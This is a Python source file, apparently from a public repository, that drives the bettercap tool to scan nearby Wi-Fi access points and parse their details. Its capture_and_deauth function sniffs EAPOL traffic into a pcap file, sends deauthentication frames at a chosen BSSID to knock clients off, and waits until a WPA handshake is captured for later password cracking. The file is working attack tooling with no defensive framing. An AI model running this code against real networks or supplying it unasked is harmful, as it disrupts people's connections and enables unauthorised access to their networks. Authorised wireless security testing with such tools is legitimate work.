-
Notifications
You must be signed in to change notification settings - Fork 5
/
bettercap.py
159 lines (136 loc) · 5.65 KB
/
bettercap.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
#!/usr/bin/env python3
# coding=utf8
from subprocess import Popen, PIPE, STDOUT
import re
import time
from datetime import datetime
import math
import os
class Bettercap:
    """Drive an interactive ``bettercap`` subprocess over its stdin/stdout pipes.

    Commands are written as text lines to the child's stdin and its combined
    stdout/stderr is read back line by line. The instance keeps at most one
    child process at a time.
    """

    # Marker line echoed by the ticker in scan_aps() so _read() knows where
    # the output of one scan ends.
    END_OF_OUTPUT = '%NINJAEND%'
    # Directory in which capture_and_deauth() creates its .pcap files.
    CAPTURE_LOCATION = '/mnt/capture'

    # Type of a compiled regular expression, used by _read() to tell a
    # pattern apart from a plain string stop marker.
    _PATTERN_TYPE = type(re.compile(''))

    # One row of the table printed by "wifi.show"; columns are separated by
    # U+2502 box-drawing bars. Group numbers are named by the _IDX_* constants.
    _AP_ROW_RE = re.compile(
        r'^\u2502\s([\+\-][0-9]{1,4})\sdBm\s\u2502\s([a-f0-9\:]{17})\s\u2502\s([^│;]+)\s\u2502\s([^│;]*)\s+\u2502\s(2\.0|1\.0|)(\s*\([a-zA-Z ]+\))?\s+\u2502\s([0-9]{1,3})\s+\u2502\s([0-9]{0,10})\s+\u2502\s([^│;]*)\s+\u2502\s([^│;]*)\s+\u2502\s([^│;]*)\s+\u2502',
        re.UNICODE | re.MULTILINE,
    )
    _IDX_DBM = 1
    _IDX_BSSID = 2
    _IDX_SSID = 3
    _IDX_ENCRYPTION = 4
    _IDX_WPS = 5
    _IDX_WPS_INFO = 6
    _IDX_CHANNEL = 7
    _IDX_CLIENTS = 8
    _IDX_DATA_SENT = 9
    _IDX_DATA_RECEIVED = 10
    _IDX_SEEN = 11

    def __init__(self, iface='wlan0'):
        """Remember the interface name; no process is started yet."""
        self._bettercap = None      # Popen handle, or None when not running
        self._iface = iface         # interface requested by the caller
        self._iface_active = None   # interface the running process was started with

    @property
    def iface(self):
        """Interface name that the next start()/restart() will use."""
        return self._iface

    @iface.setter
    def iface(self, value):
        self._iface = value

    def start(self):
        """Start bettercap, or restart it if the requested interface changed.

        Returns:
            True once a process is (or already was) running.
        """
        if self._bettercap is None:
            self._bettercap = Popen(
                ['bettercap', '-iface', self._iface, '-no-colors', '-no-history'],
                shell=False,
                cwd='/tmp',
                encoding='utf-8',
                bufsize=-1,
                stdout=PIPE,
                stdin=PIPE,
                stderr=STDOUT,
            )
            self._iface_active = self._iface
            return True

        print('Bettercap is running already, checking for iface change ...')
        if self._iface != self._iface_active:
            print('Interface changed! Restarting ...')
            self.restart()
        else:
            print('Bettercap interface did not change, not doing anything.')
        return True

    def stop(self):
        """Ask the running process to quit and wait for it to exit.

        Does nothing when no process is running. If the pipe to the process
        is already broken, the quit command is skipped but the process is
        still waited for and the handle is cleared.

        Returns:
            Always True.
        """
        if self._bettercap is None:
            return True

        try:
            print('Writing quit ...')
            self._bettercap.stdin.write('quit\n')
            print('Flushing ...')
            self._bettercap.stdin.flush()
            print('Closing ...')
            self._bettercap.stdin.close()
        except (OSError, ValueError) as err:
            # The child already exited or stdin was closed; there is nothing
            # left to tell it, so carry on with reaping the process.
            print('Could not send quit: ' + str(err))
        print('Waiting ...')
        self._bettercap.wait()
        print('Resetting ...')
        self._bettercap = None
        return True

    def restart(self):
        """Stop the running process (if any) and start a new one.

        Returns:
            The result of start(), or False if stop() did not report success.
        """
        if self._bettercap is not None:
            if self.stop() is not True:
                return False
            # Short pause between stopping and starting the process.
            time.sleep(1)
        return self.start()

    def _read(self, stop_on='', retrieve_stdout=True):
        """Read output lines until a stop condition is met.

        Args:
            stop_on: Either a string that must equal a whole line (including
                its trailing newline), or a compiled regular expression that
                is tried with ``match`` against each line.
            retrieve_stdout: When true, return everything that was read
                (the stop line included); otherwise return None.

        Reading also ends when the process handle is gone or when the
        process closes its output (readline() returns an empty string), so a
        dead process cannot make this loop spin forever.
        """
        print('Reading ...')
        collected = []
        while True:
            if self._bettercap is None:
                print('Whoops. Bettercap apparently just died. I better quit now.')
                break

            line = self._bettercap.stdout.readline()
            if retrieve_stdout:
                collected.append(line)

            if line == '':
                # End of stream: no further line will ever arrive.
                if stop_on != '':
                    print('Bettercap closed its output before the stop marker was seen.')
                break
            if isinstance(stop_on, str):
                if line == stop_on:
                    break
            elif isinstance(stop_on, self._PATTERN_TYPE):
                if stop_on.match(line) is not None:
                    break

        if retrieve_stdout:
            return ''.join(collected)
        return None

    def _execute(self, command):
        """Write ``command`` to the process, starting the process first if needed.

        The command is written verbatim, so the caller supplies the trailing
        newline.

        Returns:
            Always True.
        """
        print('Writing command:' + command)
        if self._bettercap is None:
            print('Bettercap is not running. Starting ...')
            self.start()
            # Pause after starting before the first command is written.
            time.sleep(1)
        self._bettercap.stdin.write(command)
        self._bettercap.stdin.flush()
        print('Command executed!')
        return True

    def scan_aps(self, timeout):
        """Run a Wi-Fi recon for ``timeout`` seconds and parse the result table.

        Args:
            timeout: Scan duration in seconds, as an int or a numeric string.

        Returns:
            A list with one dict per parsed table row. Keys: 'bssid', 'ssid',
            'encryption', 'wps', 'wps_info', 'channel', 'dbm', 'clients',
            'seen' and 'data' (a dict with 'sent' and 'received'). All values
            are the raw matched strings; 'wps_info' is None when the row has
            no parenthesised WPS note.
        """
        period = str(timeout)
        # TODO: Change ticker.period & time.sleep
        self._execute(
            'set wifi.show.sort clients desc; set ticker.period ' + period
            + '; set ticker.commands "clear; wifi.show; !echo \''
            + self.END_OF_OUTPUT
            + '\'; wifi.recon off; ticker off;"; wifi.recon on; ticker on;\n'
        )
        print('Sleeping ' + period + '...')
        time.sleep(int(timeout))
        output = self._read(stop_on=(self.END_OF_OUTPUT + '\n'), retrieve_stdout=True)

        return [
            {
                'bssid': row.group(self._IDX_BSSID),
                'ssid': row.group(self._IDX_SSID),
                'encryption': row.group(self._IDX_ENCRYPTION),
                'wps': row.group(self._IDX_WPS),
                'wps_info': row.group(self._IDX_WPS_INFO),
                'channel': row.group(self._IDX_CHANNEL),
                'dbm': row.group(self._IDX_DBM),
                'clients': row.group(self._IDX_CLIENTS),
                'seen': row.group(self._IDX_SEEN),
                'data': {
                    'sent': row.group(self._IDX_DATA_SENT),
                    'received': row.group(self._IDX_DATA_RECEIVED),
                },
            }
            for row in self._AP_ROW_RE.finditer(output)
        ]

    def capture_and_deauth(self, bssid, channel):
        """Sniff into a new capture file, send a deauth, and wait for a handshake line.

        Args:
            bssid: Target BSSID, inserted verbatim into the commands.
            channel: Channel to recon on, as an int or a string.

        Returns:
            Path of the capture file. The file name is the current Unix
            timestamp in whole seconds plus '.pcap'.

        Blocks until an output line matching '.* captured .* handshake .*'
        is read, or until the process output ends.
        """
        os.makedirs(self.CAPTURE_LOCATION, exist_ok=True)
        capture_file = (
            self.CAPTURE_LOCATION + '/'
            + str(math.floor(datetime.now().timestamp())) + '.pcap'
        )
        self._execute(
            'set net.sniff.verbose true; set net.sniff.filter ether proto 0x888e; set net.sniff.output '
            + capture_file
            + '; net.sniff on; wifi.recon.channel ' + str(channel)
            + '; wifi.recon on; wifi.recon ' + bssid
            + '; wifi.deauth ' + bssid + ';\n'
        )
        self._read(stop_on=re.compile(r'.* captured .* handshake .*'), retrieve_stdout=False)
        return capture_file

    def all_off(self):
        """Send the commands that turn off the sniffer, Wi-Fi recon and ticker.

        Returns:
            Always True.
        """
        # The trailing newline is what submits the command line.
        self._execute('net.sniff off; wifi.recon off; ticker off;\n')
        return True